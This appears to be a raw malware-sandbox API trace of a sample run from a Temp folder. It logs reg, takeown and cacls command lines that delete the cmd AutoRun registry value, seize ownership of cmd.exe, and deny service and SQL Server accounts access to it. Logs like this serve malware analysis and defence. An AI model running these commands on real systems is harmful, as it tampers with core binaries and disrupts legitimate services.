registers.esp: 0
registers.edi: 0
registers.eax: 4232103
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000004d4
process_identifier: 7492
1 0 0

NtResumeThread

 thread_handle: 0x000004d4
suspend_count: 1
process_identifier: 7492
1 0 0

CreateProcessInternalW

 thread_identifier: 2532
thread_handle: 0x00000088
process_identifier: 2528
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\reg.exe
track: 1
command_line: reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor" /v "AutoRun" /f
filepath_r: C:\Windows\system32\reg.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000084
1 1 0

CreateProcessInternalW

 thread_identifier: 2576
thread_handle: 0x00000084
process_identifier: 2572
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\takeown.exe
track: 1
command_line: takeown /f C:\Windows\system32\cmd.exe /a
filepath_r: C:\Windows\system32\takeown.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000088
1 1 0

CreateProcessInternalW

 thread_identifier: 2624
thread_handle: 0x0000008c
process_identifier: 2620
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: C:\Windows\system32\cmd.exe /S /D /c" echo y"
filepath_r: C:\Windows\system32\cmd.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000094
1 1 0

CreateProcessInternalW

 thread_identifier: 2660
thread_handle: 0x00000084
process_identifier: 2656
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\cacls.exe
track: 1
command_line: cacls C:\Windows\system32\cmd.exe /g Administrators:f
filepath_r: C:\Windows\system32\cacls.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x0000008c
1 1 0

CreateProcessInternalW

 thread_identifier: 2716
thread_handle: 0x00000094
process_identifier: 2712
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: C:\Windows\system32\cmd.exe /S /D /c" echo y"
filepath_r: C:\Windows\system32\cmd.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000084
1 1 0

CreateProcessInternalW

 thread_identifier: 2752
thread_handle: 0x0000008c
process_identifier: 2748
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\cacls.exe
track: 1
command_line: cacls C:\Windows\system32\cmd.exe /e /g Users:r
filepath_r: C:\Windows\system32\cacls.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000094
1 1 0

CreateProcessInternalW

 thread_identifier: 2808
thread_handle: 0x00000084
process_identifier: 2804
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: C:\Windows\system32\cmd.exe /S /D /c" echo y"
filepath_r: C:\Windows\system32\cmd.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x0000008c
1 1 0

CreateProcessInternalW

 thread_identifier: 2844
thread_handle: 0x00000094
process_identifier: 2840
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\cacls.exe
track: 1
command_line: cacls C:\Windows\system32\cmd.exe /e /g Administrators:r
filepath_r: C:\Windows\system32\cacls.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000084
1 1 0

CreateProcessInternalW

 thread_identifier: 2904
thread_handle: 0x0000008c
process_identifier: 2900
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: C:\Windows\system32\cmd.exe /S /D /c" echo y"
filepath_r: C:\Windows\system32\cmd.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000094
1 1 0

CreateProcessInternalW

 thread_identifier: 2940
thread_handle: 0x00000084
process_identifier: 2936
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\cacls.exe
track: 1
command_line: cacls C:\Windows\system32\cmd.exe /e /d SERVICE
filepath_r: C:\Windows\system32\cacls.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x0000008c
1 1 0

CreateProcessInternalW

 thread_identifier: 2996
thread_handle: 0x00000094
process_identifier: 2992
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: C:\Windows\system32\cmd.exe /S /D /c" echo y"
filepath_r: C:\Windows\system32\cmd.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000084
1 1 0

CreateProcessInternalW

 thread_identifier: 3032
thread_handle: 0x0000008c
process_identifier: 3028
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\cacls.exe
track: 1
command_line: cacls C:\Windows\system32\cmd.exe /e /d mssqlserver
filepath_r: C:\Windows\system32\cacls.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000094
1 1 0

CreateProcessInternalW

 thread_identifier: 2124
thread_handle: 0x00000084
process_identifier: 2116
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
filepath_r: C:\Windows\system32\cmd.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x0000008c
1 1 0

CreateProcessInternalW

 thread_identifier: 2140
thread_handle: 0x00000094
process_identifier: 1156
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\cacls.exe
track: 1
command_line: cacls C:\Windows\system32\cmd.exe /e /d "network service"
filepath_r: C:\Windows\system32\cacls.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000084
1 1 0

CreateProcessInternalW

 thread_identifier: 2432
thread_handle: 0x0000008c
process_identifier: 2420
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: C:\Windows\system32\cmd.exe /S /D /c" echo y"
filepath_r: C:\Windows\system32\cmd.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000094
1 1 0

CreateProcessInternalW

 thread_identifier: 2512
thread_handle: 0x00000084
process_identifier: 2500
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\cacls.exe
track: 1
command_line: cacls C:\Windows\system32\cmd.exe /e /g system:r
filepath_r: C:\Windows\system32\cacls.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x0000008c
1 1 0

CreateProcessInternalW

 thread_identifier: 2568
thread_handle: 0x00000094
process_identifier: 2560
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
filepath_r: C:\Windows\system32\cmd.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000084
1 1 0

CreateProcessInternalW

 thread_identifier: 2612
thread_handle: 0x0000008c
process_identifier: 2616
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\cacls.exe
track: 1
command_line: cacls C:\Windows\system32\cmd.exe /e /d mssql$sqlexpress
filepath_r: C:\Windows\system32\cacls.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000094
1 1 0

CreateProcessInternalW

 thread_identifier: 2652
thread_handle: 0x00000094
process_identifier: 2648
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\takeown.exe
track: 1
command_line: takeown /f C:\Windows\SysWOW64\cmd.exe /a
filepath_r: C:\Windows\system32\takeown.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000084
1 1 0

CreateProcessInternalW

 thread_identifier: 2660
thread_handle: 0x00000094
process_identifier: 2704
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: C:\Windows\system32\cmd.exe /S /D /c" echo y"
filepath_r: C:\Windows\system32\cmd.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000090
1 1 0

CreateProcessInternalW

 thread_identifier: 2784
thread_handle: 0x00000084
process_identifier: 2764
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\cacls.exe
track: 1
command_line: cacls C:\Windows\SysWOW64\cmd.exe /g Administrators:f
filepath_r: C:\Windows\system32\cacls.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000094
1 1 0

CreateProcessInternalW

 thread_identifier: 2856
thread_handle: 0x00000090
process_identifier: 2860
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: C:\Windows\system32\cmd.exe /S /D /c" echo y"
filepath_r: C:\Windows\system32\cmd.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000084
1 1 0

CreateProcessInternalW

 thread_identifier: 2916
thread_handle: 0x00000094
process_identifier: 2920
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\cacls.exe
track: 1
command_line: cacls C:\Windows\SysWOW64\cmd.exe /e /g Users:r
filepath_r: C:\Windows\system32\cacls.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000090
1 1 0

CreateProcessInternalW

 thread_identifier: 2984
thread_handle: 0x00000084
process_identifier: 2988
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: C:\Windows\system32\cmd.exe /S /D /c" echo y"
filepath_r: C:\Windows\system32\cmd.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000094
1 1 0

CreateProcessInternalW

 thread_identifier: 3044
thread_handle: 0x00000090
process_identifier: 3048
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\cacls.exe
track: 1
command_line: cacls C:\Windows\SysWOW64\cmd.exe /e /g Administrators:r
filepath_r: C:\Windows\system32\cacls.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000084
1 1 0

CreateProcessInternalW

 thread_identifier: 880
thread_handle: 0x00000094
process_identifier: 948
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: C:\Windows\system32\cmd.exe /S /D /c" echo y"
filepath_r: C:\Windows\system32\cmd.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000090
1 1 0

CreateProcessInternalW

 thread_identifier: 2376
thread_handle: 0x00000084
process_identifier: 2404
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\cacls.exe
track: 1
command_line: cacls C:\Windows\SysWOW64\cmd.exe /e /d SERVICE
filepath_r: C:\Windows\system32\cacls.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000094
1 1 0

CreateProcessInternalW

 thread_identifier: 2556
thread_handle: 0x00000090
process_identifier: 2432
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: C:\Windows\system32\cmd.exe /S /D /c" echo y"
filepath_r: C:\Windows\system32\cmd.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000084
1 1 0

CreateProcessInternalW

 thread_identifier: 1188
thread_handle: 0x00000094
process_identifier: 416
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\cacls.exe
track: 1
command_line: cacls C:\Windows\SysWOW64\cmd.exe /e /d mssqlserver
filepath_r: C:\Windows\system32\cacls.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000090
1 1 0